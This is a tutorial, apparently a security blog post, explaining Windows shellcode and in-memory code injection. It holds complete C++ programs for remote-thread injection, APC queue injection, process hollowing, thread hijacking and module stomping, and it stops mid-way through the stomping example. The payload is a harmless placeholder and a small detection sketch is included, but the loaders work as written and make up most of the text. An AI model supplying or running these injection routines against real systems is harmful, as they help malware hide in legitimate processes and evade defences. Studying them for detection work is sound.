Ever wondered how attackers manage to sneak their malicious code into running programs without triggering alarms? The answer often lies in a sophisticated technique called in-memory code injection, and at its heart is a powerful concept known as shellcode.
What Exactly is Shellcode?
Imagine a tiny, self-contained program, stripped down to its bare essentials, designed to perform a very specific task. That’s shellcode. It’s a set of raw CPU instructions, usually written in assembly language, that gets executed after a vulnerability is successfully exploited. Unlike regular Windows executables, shellcode is lean and mean: it has no PE headers or sections. It is written as Position Independent Code (PIC), meaning it uses no hard-coded absolute addresses and can run no matter where it lands in memory. Its ultimate goal? To set up CPU registers and call system functions directly, often to open a backdoor, gain control, or perform other covert actions.
The Stealthy Dance of Code Injection
The act of injecting and executing shellcode in memory is like a digital stealth operation. Malicious code is secretly slipped into the memory space of another running process, and then that process is tricked into executing it. Why do attackers bother with this elaborate dance? For several compelling reasons:
- Evading Defenses: Hiding from antivirus and other security tools.
- Privilege Escalation: Gaining higher access rights than they normally have.
- Altering Functionality: Modifying how a legitimate program behaves.
The General Playbook for Code Injection
While the methods can get intricate, the core steps of code injection generally follow this pattern:
- Locate the Target Process: First, the attacker needs to pick a target: either any running process they have sufficient rights to open, or a specific one like explorer.exe or svchost.exe. APIs like CreateToolhelp32Snapshot help them find their mark.
- Allocate Memory in the Target Process: Next, they carve out a hidden space within the target process’s virtual memory using APIs like VirtualAllocEx or NtAllocateVirtualMemory.
- Write the Code to the Allocated Memory: The shellcode or other malicious payload is then secretly copied from the attacker’s process into this newly created memory using functions like WriteProcessMemory or NtWriteVirtualMemory.
- Execute the Injected Code: Finally, the attacker redirects the target process’s execution flow to their injected code, often by creating a new thread that starts running the shellcode.
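Seen from the defender’s side, the steps above form a recognizable ordering of API calls. The sketch below is a toy, portable C++ model of that idea and calls no Windows APIs: it scans a hypothetical trace of API names recorded for one process and reports whether an allocate call, then a write call, then an execute call appear in that order. The trace format, the function names (inGroup, looksLikeClassicInjection), and the way the APIs are grouped are assumptions made for illustration; real monitoring tools rely on much richer telemetry.

```cpp
#include <array>
#include <cstddef>
#include <string>
#include <vector>

// Hypothetical helper: true if `name` matches one of the API names in `group`.
template <std::size_t N>
bool inGroup(const std::string& name, const std::array<const char*, N>& group) {
    for (const char* api : group) {
        if (name == api) return true;
    }
    return false;
}

// Returns true when the trace contains an allocate call, later a write call,
// and later still an execute call. Calls that arrive out of order are ignored.
bool looksLikeClassicInjection(const std::vector<std::string>& trace) {
    static const std::array<const char*, 2> allocApis = {"VirtualAllocEx", "NtAllocateVirtualMemory"};
    static const std::array<const char*, 2> writeApis = {"WriteProcessMemory", "NtWriteVirtualMemory"};
    static const std::array<const char*, 2> execApis  = {"CreateRemoteThread", "QueueUserAPC"};

    int stage = 0; // 0 = nothing seen, 1 = allocate seen, 2 = write seen, 3 = execute seen
    for (const std::string& call : trace) {
        if (stage == 0 && inGroup(call, allocApis)) {
            stage = 1;
        } else if (stage == 1 && inGroup(call, writeApis)) {
            stage = 2;
        } else if (stage == 2 && inGroup(call, execApis)) {
            stage = 3;
        }
    }
    return stage == 3;
}
```

Passing a trace such as OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread returns true, while the same calls in a different order do not. An ordering check this simple would produce false positives on legitimate software such as debuggers, so treat it as a way to reason about the pattern rather than as a detector.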
Conceptual Code Examples & Explanations
IMPORTANT DISCLAIMER
The following code examples are provided for EDUCATIONAL AND RESEARCH PURPOSES ONLY. Understanding these techniques is crucial for developing defensive strategies, but DO NOT use this information or code for any malicious activities. Unauthorized access to or modification of computer systems is illegal and unethical. You are solely responsible for your actions. These examples are simplified, may be detected by security software, and are intended to demonstrate core logic, not to be fully functional attack tools.
Shellcode Placeholder
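For these examples, we’ll use a generic placeholder instead of a real payload. In a real attack, this would be the actual malicious payload. The placeholder consists of three NOP (No Operation) instructions, an INT3 (debug breakpoint), and a RET (Return) instruction. It carries no payload, but note that the INT3 raises a breakpoint exception: if no debugger is attached to the target, that exception will typically go unhandled and terminate the process, so only try this against a disposable test process.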
// Shellcode placeholder
unsigned char shellcode[] = {
0x90, // NOP
0x90, // NOP
0x90, // NOP
0xCC, // INT3 (Debug Breakpoint)
0xC3 // RET (Return)
};
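To make the placeholder concrete, the following portable sketch maps each byte to its mnemonic. The describeOpcode and describePlaceholder helpers are hypothetical names introduced here, and they only know the three single-byte x86 opcodes used in the placeholder; this is a lookup table for illustration, not a disassembler.

```cpp
#include <cstddef>
#include <string>
#include <vector>

// Maps one of the three placeholder opcodes to its mnemonic.
// Any other byte is reported as "UNKNOWN" rather than guessed at.
std::string describeOpcode(unsigned char byte) {
    switch (byte) {
        case 0x90: return "NOP";
        case 0xCC: return "INT3";
        case 0xC3: return "RET";
        default:   return "UNKNOWN";
    }
}

// Walks a buffer byte by byte and collects the mnemonics in order.
// This only works because every opcode in the placeholder is exactly one byte long.
std::vector<std::string> describePlaceholder(const unsigned char* code, std::size_t length) {
    std::vector<std::string> mnemonics;
    mnemonics.reserve(length);
    for (std::size_t i = 0; i < length; ++i) {
        mnemonics.push_back(describeOpcode(code[i]));
    }
    return mnemonics;
}
```

Calling describePlaceholder(shellcode, sizeof(shellcode)) on the array above yields five entries: three NOPs, then INT3, then RET.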
General Notes for All Examples:
- Error Handling: For brevity, most error handling (checking return values of API calls, etc.) is omitted or indicated by comments. In real-world code, robust error handling is essential.
- Process ID (PID): Examples requiring a target process ID (PID) will assume targetPID is already obtained. You would typically use functions like CreateToolhelp32Snapshot, Process32First, and Process32Next to find the PID of a target process by its name. The dummy getTargetPID and getFirstThreadID functions are illustrative.
- Permissions: Many of these operations require appropriate process permissions (e.g., PROCESS_ALL_ACCESS). The attacking process might need administrative privileges.
- 32-bit vs. 64-bit: While the API names are often the same, pointer sizes, structure layouts (like CONTEXT), and assembly instructions will differ between 32-bit and 64-bit architectures. These examples are conceptually C++ and try to be architecture-agnostic at the API call level where possible, but specific implementations would need to account for the target architecture (e.g., Eip vs Rip in CONTEXT).
- Nt* APIs: Using Nt* APIs (Native APIs) often involves dynamically loading ntdll.dll using LoadLibraryA or LoadLibraryW and then retrieving the function addresses using GetProcAddress. This is shown in some examples but is a necessary step for direct native API calls.
- Compilation: To compile these C++ examples, you’d use a compiler like MinGW (g++) or MSVC (cl.exe) and link against necessary libraries (e.g., kernel32.lib, user32.lib, ntdll.lib as needed). Include headers like <windows.h>, <iostream>, <tlhelp32.h>, and <winternl.h>.
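The 32-bit vs. 64-bit note can be made concrete with a few lines of standard C++. This sketch assumes nothing beyond the language itself: it reports the pointer width of the current build, names the instruction-pointer field that a CONTEXT structure would expose for that width, and computes a structure offset as "two pointer-sized fields in", which is the same arithmetic the process hollowing example uses for the image base field of the PEB (0x8 on 32-bit, 0x10 on 64-bit). The names kPointerBits, twoPointerFieldOffset, and instructionPointerName are illustrative, not part of any API.

```cpp
#include <cstddef>
#include <string>

// Pointer width of the build that compiles this file (32 or 64 on common targets).
constexpr std::size_t kPointerBits = sizeof(void*) * 8;

// Offset of a field that follows two pointer-sized fields in a structure.
constexpr std::size_t twoPointerFieldOffset(std::size_t pointerSize) {
    return pointerSize * 2;
}

// Name of the CONTEXT instruction-pointer member for a given pointer size.
std::string instructionPointerName(std::size_t pointerSize) {
    return pointerSize == 8 ? "Rip" : "Eip";
}

// Compile-time checks documenting the two cases discussed in the text.
static_assert(twoPointerFieldOffset(4) == 0x8,  "32-bit: offset 0x8");
static_assert(twoPointerFieldOffset(8) == 0x10, "64-bit: offset 0x10");
```

Because the offset is derived from sizeof(void*), it follows the architecture of the program being compiled, which only matches the target when both are built for the same bitness.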
Beyond the Basics: Advanced Code Injection Techniques
Attackers have a whole arsenal of techniques to achieve in-memory code injection, each with its own nuances and stealth capabilities. Let’s explore some of the most common ones with conceptual code examples:
1. Classical Shellcode Injection: The Foundation
This is the most straightforward approach, following the general steps outlined above. It uses standard Windows APIs like OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread to get the job done. Because shellcode has no headers or import table for the Windows loader to process, it must handle any setup and API resolution it needs internally.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
// Shellcode defined globally or included
unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy function to simulate obtaining a PID
DWORD getTargetPID(const wchar_t* targetProcessName) {
// In a real scenario, implement this using CreateToolhelp32Snapshot, Process32First, Process32Next
std::wcout << L"INFO: Replace getTargetPID with actual process enumeration for " << targetProcessName << std::endl;
// For demonstration, find PID of an existing process like "notepad.exe"
// This part needs to be implemented to find a real PID.
// Example: return findProcessIdByName(L"notepad.exe");
HWND hwnd = FindWindowW(L"Notepad", NULL); // Example for Notepad
if (hwnd) {
DWORD pid;
GetWindowThreadProcessId(hwnd, &pid);
std::wcout << L"Found Notepad PID: " << pid << std::endl;
return pid;
}
std::wcerr << L"Target process " << targetProcessName << L" not found for PID." << std::endl;
return 0; // Placeholder if not found
}
int main_classical_injection() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example: Target Notepad
if (targetPID == 0) {
std::cerr << "Target process PID not obtained. Exiting." << std::endl;
return 1;
}
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process. Error: " << GetLastError() << std::endl;
return 1;
}
std::cout << "Target process opened successfully." << std::endl;
LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) {
std::cerr << "Failed to allocate memory in target process. Error: " << GetLastError() << std::endl;
CloseHandle(hProcess);
return 1;
}
std::cout << "Memory allocated in target process at: " << pRemoteMem << std::endl;
if (!WriteProcessMemory(hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "Failed to write shellcode to target process. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
std::cout << "Shellcode written to target process memory." << std::endl;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteMem, NULL, 0, NULL);
if (hThread == NULL) {
std::cerr << "Failed to create remote thread in target process. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
std::cout << "Remote thread created. Shellcode should execute." << std::endl;
// Optional: wait for the thread to finish before cleaning up.
// WaitForSingleObject(hThread, INFINITE);
// Freeing the remote memory is only safe after the thread has finished;
// whether to free it at all depends on the shellcode's behavior.
// VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hThread);
CloseHandle(hProcess);
// To run this example, call it from main():
// int main() { return main_classical_injection(); }
return 0;
}
2. APC Queue Code Injection: Abusing Asynchronous Calls
This clever technique exploits Windows’ Asynchronous Procedure Call (APC) mechanism. Attackers write their shellcode to the target process’s memory and then queue it as an APC for one or more target threads using QueueUserAPC or NtQueueApcThread. When a target thread enters an “alertable” state (e.g., by calling SleepEx or WaitForSingleObjectEx with the alertable flag set), it drains its APC queue and, surprise, executes the malicious shellcode. If the thread never becomes alertable, the APC never runs. “Early Bird” APC injection is a particularly stealthy variation that queues the APC to the main thread of a newly created, suspended process.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <tlhelp32.h> // For thread enumeration
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous example)
// Function to get the first thread ID of a process
DWORD getFirstThreadID(DWORD dwProcessID) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hSnap == INVALID_HANDLE_VALUE) {
std::cerr << "CreateToolhelp32Snapshot (threads) failed. Error: " << GetLastError() << std::endl;
return 0;
}
THREADENTRY32 te32;
te32.dwSize = sizeof(THREADENTRY32);
if (Thread32First(hSnap, &te32)) {
do {
if (te32.th32OwnerProcessID == dwProcessID) {
CloseHandle(hSnap);
std::cout << "Found thread ID: " << te32.th32ThreadID << " for PID: " << dwProcessID << std::endl;
return te32.th32ThreadID;
}
} while (Thread32Next(hSnap, &te32));
}
std::cerr << "Could not find a thread for PID: " << dwProcessID << std::endl;
CloseHandle(hSnap);
return 0; // No thread found or error
}
int main_apc_injection() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
if (targetPID == 0) {
std::cerr << "Target process PID not obtained for APC injection. Exiting." << std::endl;
return 1;
}
DWORD targetThreadID = getFirstThreadID(targetPID);
if (targetThreadID == 0) {
std::cerr << "Failed to find a thread in the target process for APC injection." << std::endl;
return 1;
}
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for APC. Error: " << GetLastError() << std::endl;
return 1;
}
LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) {
std::cerr << "VirtualAllocEx failed for APC. Error: " << GetLastError() << std::endl;
CloseHandle(hProcess);
return 1;
}
if (!WriteProcessMemory(hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "WriteProcessMemory failed for APC. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
HANDLE hThread = OpenThread(THREAD_SET_CONTEXT, FALSE, targetThreadID);
// THREAD_SET_CONTEXT is required for QueueUserAPC.
// Alternatively, THREAD_ALL_ACCESS, but be mindful of least privilege.
if (hThread == NULL) {
std::cerr << "Failed to open target thread for APC. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
CloseHandle(hProcess);
return 1;
}
if (QueueUserAPC((PAPCFUNC)pRemoteMem, hThread, NULL) == 0) {
std::cerr << "Failed to queue APC. Error: " << GetLastError() << std::endl;
} else {
std::cout << "APC queued successfully to thread " << targetThreadID << "." << std::endl;
std::cout << "Shellcode at " << pRemoteMem << " will execute when the thread enters an alertable state." << std::endl;
}
// pRemoteMem is not freed here because the queued APC still needs it.
// Freeing it (VirtualFreeEx with MEM_RELEASE) would have to happen after confirming
// execution and before hProcess is closed; proper cleanup is context-dependent.
CloseHandle(hThread);
CloseHandle(hProcess);
return 0;
}
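The alertable-state behavior that APC injection depends on can be modeled without any Windows calls. The sketch below is a toy simulation, not the Windows implementation: ToyThread and its member functions are hypothetical names, and the queue holds ordinary C++ callables. It shows only the rule described above, that queued callbacks stay pending through non-alertable waits and run, in first-in first-out order, once the thread performs an alertable wait.

```cpp
#include <cstddef>
#include <functional>
#include <queue>
#include <utility>

// Toy model of a thread's user-mode APC queue.
class ToyThread {
public:
    // Queuing never runs the callback; it only records it.
    void queueApc(std::function<void()> apc) { pending_.push(std::move(apc)); }

    // A non-alertable wait leaves every queued callback untouched.
    void waitNonAlertable() {}

    // An alertable wait drains the queue in FIFO order and
    // returns how many callbacks were executed.
    std::size_t waitAlertable() {
        std::size_t ran = 0;
        while (!pending_.empty()) {
            std::function<void()> apc = std::move(pending_.front());
            pending_.pop();
            apc();
            ++ran;
        }
        return ran;
    }

    std::size_t pendingCount() const { return pending_.size(); }

private:
    std::queue<std::function<void()>> pending_;
};
```

In this model, a callback queued on a ToyThread that only ever calls waitNonAlertable never executes, which mirrors why the technique targets threads known to wait alertably, and why defenders pay attention to APCs queued across process boundaries.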
3. Process Hollowing: The Ghost in the Machine
Imagine creating a legitimate process, then literally “hollowing out” its original code by unmapping its memory sections. That’s process hollowing. Malicious code is then written into the empty space, and the legitimate process’s main thread is resumed, but now it’s executing the injected code. This makes the malicious code run under the guise of a legitimate process name, making it harder to spot.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <winternl.h> // For PEB and NtQueryInformationProcess, PROCESS_BASIC_INFORMATION
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Define NtQueryInformationProcess and NtUnmapViewOfSection if not available or for clarity
typedef NTSTATUS(WINAPI* PNTQUERYINFORMATIONPROCESS)(
HANDLE ProcessHandle,
PROCESSINFOCLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
typedef NTSTATUS(WINAPI* PNTUNMAPVIEWOFSECTION)(
HANDLE ProcessHandle,
PVOID BaseAddress
);
int main_process_hollowing() {
wchar_t targetPath[MAX_PATH];
GetSystemDirectoryW(targetPath, MAX_PATH); // Get System32 path
wcscat_s(targetPath, MAX_PATH, L"\\notepad.exe"); // Target a common legitimate process
STARTUPINFOW si = { sizeof(si) };
PROCESS_INFORMATION pi;
if (!CreateProcessW(NULL, targetPath, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
std::wcerr << L"Failed to create suspended process (" << targetPath << L"). Error: " << GetLastError() << std::endl; // wide stream: targetPath is a wchar_t buffer
return 1;
}
std::wcout << L"Process " << targetPath << L" created in suspended state (PID: " << pi.dwProcessId << L")" << std::endl;
HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
PNTQUERYINFORMATIONPROCESS pNtQueryInformationProcess = (PNTQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "NtQueryInformationProcess");
PNTUNMAPVIEWOFSECTION pNtUnmapViewOfSection = (PNTUNMAPVIEWOFSECTION)GetProcAddress(hNtdll, "NtUnmapViewOfSection");
if (!pNtQueryInformationProcess || !pNtUnmapViewOfSection) {
std::cerr << "Failed to get native API function pointers for hollowing." << std::endl;
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
PROCESS_BASIC_INFORMATION pbi;
ULONG returnLength;
NTSTATUS status = pNtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);
if (!NT_SUCCESS(status)) {
std::cerr << "NtQueryInformationProcess failed. Status: " << std::hex << status << std::endl;
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
// The PEB is at pbi.PebBaseAddress; ImageBaseAddress sits two pointer-sized
// fields into it (offset 0x10 on 64-bit, 0x8 on 32-bit).
// This is a simplified approach: a more robust solution would parse the PE header
// of the target to find the exact ImageBase.
PVOID imageBaseAddressFromPeb = nullptr;
SIZE_T bytesRead = 0;
// sizeof(PVOID) * 2 matches the offset for the architecture this program is built for.
DWORD_PTR pebImageBaseOffset = sizeof(PVOID) * 2;
if (!ReadProcessMemory(pi.hProcess, (PBYTE)pbi.PebBaseAddress + pebImageBaseOffset, &imageBaseAddressFromPeb, sizeof(PVOID), &bytesRead) || bytesRead != sizeof(PVOID)) {
std::cerr << "Failed to read ImageBaseAddress from PEB. Error: " << GetLastError() << std::endl;
// Fallback: try to unmap pi.hProcess's supposed base if PEB read fails. This is less reliable.
// imageBaseAddressFromPeb = (PVOID) some_guessed_base; // Not recommended
}
// If imageBaseAddressFromPeb is successfully read, try to unmap it.
// This is the "hollowing" part.
if (imageBaseAddressFromPeb) {
status = pNtUnmapViewOfSection(pi.hProcess, imageBaseAddressFromPeb);
if (!NT_SUCCESS(status)) {
std::cerr << "NtUnmapViewOfSection failed. Status: " << std::hex << status << ". This might be okay if no image was mapped there or due to protections." << std::endl;
// Continue anyway, as VirtualAllocEx might still work.
} else {
std::cout << "Original image unmapped (hollowed) successfully from " << imageBaseAddressFromPeb << std::endl;
}
} else {
std::cerr << "Could not determine image base from PEB to unmap. Proceeding with allocation." << std::endl;
}
// Allocate memory for our shellcode, preferably at the original image base if unmapped.
LPVOID pRemoteMem = VirtualAllocEx(pi.hProcess, imageBaseAddressFromPeb, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) { // If allocation at original base fails, try anywhere
pRemoteMem = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
}
if (pRemoteMem == NULL) {
std::cerr << "Failed to allocate memory in hollowed process. Error: " << GetLastError() << std::endl;
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
std::cout << "Memory for shellcode allocated at: " << pRemoteMem << std::endl;
if (!WriteProcessMemory(pi.hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "Failed to write shellcode to hollowed process. Error: " << GetLastError() << std::endl;
VirtualFreeEx(pi.hProcess, pRemoteMem, 0, MEM_RELEASE);
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
CONTEXT context;
context.ContextFlags = CONTEXT_CONTROL; // For Eip/Rip
if (!GetThreadContext(pi.hThread, &context)) {
std::cerr << "GetThreadContext failed. Error: " << GetLastError() << std::endl;
/* cleanup */ return 1;
}
#ifdef _WIN64
context.Rip = (DWORD64)pRemoteMem; // Point RIP to our shellcode
#else
context.Eip = (DWORD)pRemoteMem; // Point EIP to our shellcode
#endif
if (!SetThreadContext(pi.hThread, &context)) {
std::cerr << "Failed to set thread context. Error: " << GetLastError() << std::endl;
VirtualFreeEx(pi.hProcess, pRemoteMem, 0, MEM_RELEASE);
TerminateProcess(pi.hProcess, 1); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
std::cout << "Thread context updated to point to shellcode." << std::endl;
if (ResumeThread(pi.hThread) == (DWORD)-1) {
std::cerr << "Failed to resume thread. Error: " << GetLastError() << std::endl;
} else {
std::wcout << L"Process resumed. Shellcode should be executing under guise of " << targetPath << std::endl; // wide stream: targetPath is a wchar_t buffer
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
4. Thread Hijacking: Taking Control of an Existing Thread
Why create a new thread when you can hijack an existing one? This technique involves taking control of an active thread in the target process. The attacker suspends the thread, allocates memory, writes the shellcode, modifies the thread’s execution context (its Instruction Pointer) to point to the shellcode, and then resumes the thread. The hijacked thread then dutifully executes the malicious code.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <tlhelp32.h> // For thread enumeration
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID and ThreadID functions (e.g., getTargetPID, getFirstThreadID from previous examples)
int main_thread_hijacking() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
if (targetPID == 0) {
std::cerr << "Target PID not obtained for thread hijacking." << std::endl;
return 1;
}
DWORD targetThreadID = getFirstThreadID(targetPID); // Get a thread to hijack
if (targetThreadID == 0) {
std::cerr << "Failed to find a thread to hijack in target process." << std::endl;
return 1;
}
std::cout << "Attempting to hijack thread ID: " << targetThreadID << " in PID: " << targetPID << std::endl;
// THREAD_ALL_ACCESS is broad; specific permissions:
// THREAD_SUSPEND_RESUME, THREAD_GET_CONTEXT, THREAD_SET_CONTEXT, THREAD_QUERY_INFORMATION
HANDLE hThread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, targetThreadID);
if (hThread == NULL) {
std::cerr << "Failed to open target thread. Error: " << GetLastError() << std::endl;
return 1;
}
if (SuspendThread(hThread) == (DWORD)-1) {
std::cerr << "Failed to suspend target thread. Error: " << GetLastError() << std::endl;
CloseHandle(hThread);
return 1;
}
std::cout << "Target thread " << targetThreadID << " suspended." << std::endl;
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for memory ops. Error: " << GetLastError() << std::endl;
ResumeThread(hThread); CloseHandle(hThread);
return 1;
}
LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pRemoteMem == NULL) {
std::cerr << "VirtualAllocEx failed for hijacking. Error: " << GetLastError() << std::endl;
ResumeThread(hThread); CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
if (!WriteProcessMemory(hProcess, pRemoteMem, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "WriteProcessMemory failed for hijacking. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
ResumeThread(hThread); CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
std::cout << "Shellcode written to " << pRemoteMem << std::endl;
CONTEXT context;
context.ContextFlags = CONTEXT_CONTROL; // For Eip/Rip
if (!GetThreadContext(hThread, &context)) {
std::cerr << "GetThreadContext failed. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
ResumeThread(hThread); CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
// Save original EIP/RIP if you plan to restore it later (complex: requires more shellcode logic)
#ifdef _WIN64
// DWORD64 originalRip = context.Rip; // Save original RIP
context.Rip = (DWORD64)pRemoteMem;
#else
// DWORD originalEip = context.Eip; // Save original EIP
context.Eip = (DWORD)pRemoteMem;
#endif
if (!SetThreadContext(hThread, &context)) {
std::cerr << "SetThreadContext failed. Error: " << GetLastError() << std::endl;
VirtualFreeEx(hProcess, pRemoteMem, 0, MEM_RELEASE);
ResumeThread(hThread); // Attempt to resume to avoid leaving thread suspended
CloseHandle(hThread); CloseHandle(hProcess);
return 1;
}
std::cout << "Thread context updated. Resuming thread..." << std::endl;
if (ResumeThread(hThread) == (DWORD)-1) {
std::cerr << "Failed to resume thread. Error: " << GetLastError() << std::endl;
} else {
std::cout << "Thread resumed. Shellcode should be executing." << std::endl;
}
CloseHandle(hThread);
CloseHandle(hProcess);
// pRemoteMem is now being executed by the hijacked thread. Cleanup is complex.
return 0;
}
5. Module Stomping: Overwriting Legitimacy
This method involves injecting shellcode by overwriting a legitimate, already loaded module (like a DLL) in a target process. A benign DLL is injected, or an existing one is targeted, and then its entry point or another executable section is “stomped” over with the malicious shellcode. A new thread is then started, pointing to this overwritten entry point, or an existing function call is leveraged, making the malicious code appear to be part of a legitimate module.
Conceptual C/C++ Code Example:
#include <windows.h>
#include <iostream>
#include <tlhelp32.h> // For module enumeration
#include <wchar.h> // For _wcsicmp
// Shellcode defined globally or included
// unsigned char shellcode[] = { 0x90, 0x90, 0x90, 0xCC, 0xC3 };
// Dummy PID function (e.g., getTargetPID from previous examples)
MODULEENTRY32W getRemoteModuleInfo(DWORD targetPID, const wchar_t* moduleName) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, targetPID);
MODULEENTRY32W me32 = {0}; // Use W version for wide strings
me32.dwSize = sizeof(MODULEENTRY32W);
if (hSnap == INVALID_HANDLE_VALUE) {
std::cerr << "CreateToolhelp32Snapshot (modules) failed: " << GetLastError() << std::endl;
return me32; // Return empty struct
}
if (Module32FirstW(hSnap, &me32)) {
do {
if (_wcsicmp(me32.szModule, moduleName) == 0) { // Case-insensitive comparison
CloseHandle(hSnap);
std::wcout << L"Found module: " << me32.szModule << L" at base: " << me32.modBaseAddr << std::endl;
return me32;
}
} while (Module32NextW(hSnap, &me32));
}
std::wcerr << L"Module " << moduleName << L" not found in PID: " << targetPID << std::endl;
CloseHandle(hSnap);
return me32; // Return empty if not found (me32.modBaseAddr will be 0)
}
int main_module_stomping() {
DWORD targetPID = getTargetPID(L"notepad.exe"); // Example target
// Be VERY careful choosing a module. Stomping critical system DLLs will likely crash the system or process.
// For PoC, a non-critical DLL or one known to have unused executable space might be chosen.
// Example: L"user32.dll" or a less common DLL.
// Using kernelbase.dll is risky but often loaded.
const wchar_t* targetModule = L"kernelbase.dll"; // Example: a commonly loaded DLL.
if (targetPID == 0) {
std::cerr << "Target PID not obtained for module stomping." << std::endl;
return 1;
}
MODULEENTRY32W me32 = getRemoteModuleInfo(targetPID, targetModule);
if (me32.modBaseAddr == NULL) {
std::wcerr << L"Target module " << targetModule << L" not found in target process." << std::endl;
return 1;
}
// For simplicity, we'll try to stomp at an offset from the base.
// A real attack would parse PE headers to find .text section or a specific function.
// DllEntryPoint is at an offset specified in PE Optional Header.
// Here, we just pick an arbitrary small offset into the module for PoC.
// Ensure this offset is within an EXECUTABLE section of the module.
LPVOID targetAddressToStomp = (LPVOID)((DWORD_PTR)me32.modBaseAddr + 0x1000); // Example offset
// This offset MUST point to an executable region and be large enough for the shellcode.
std::wcout << L"Attempting to stomp module " << targetModule << L" at address " << targetAddressToStomp << std::endl;
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_CREATE_THREAD, FALSE, targetPID);
if (hProcess == NULL) {
std::cerr << "Failed to open target process for stomping. Error: " << GetLastError() << std::endl;
return 1;
}
DWORD oldProtect;
if (!VirtualProtectEx(hProcess, targetAddressToStomp, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &oldProtect)) {
std::cerr << "Failed to change memory protection for stomping. Error: " << GetLastError() << std::endl;
std::cerr << "Ensure the target address " << targetAddressToStomp << " is valid and part of the module." << std::endl;
CloseHandle(hProcess);
return 1;
}
std::cout << "Memory protection changed to RWX." << std::endl;
if (!WriteProcessMemory(hProcess, targetAddressToStomp, shellcode, sizeof(shellcode), NULL)) {
std::cerr << "Failed to write shellcode (stomp). Error: " << GetLastError() << std::endl;
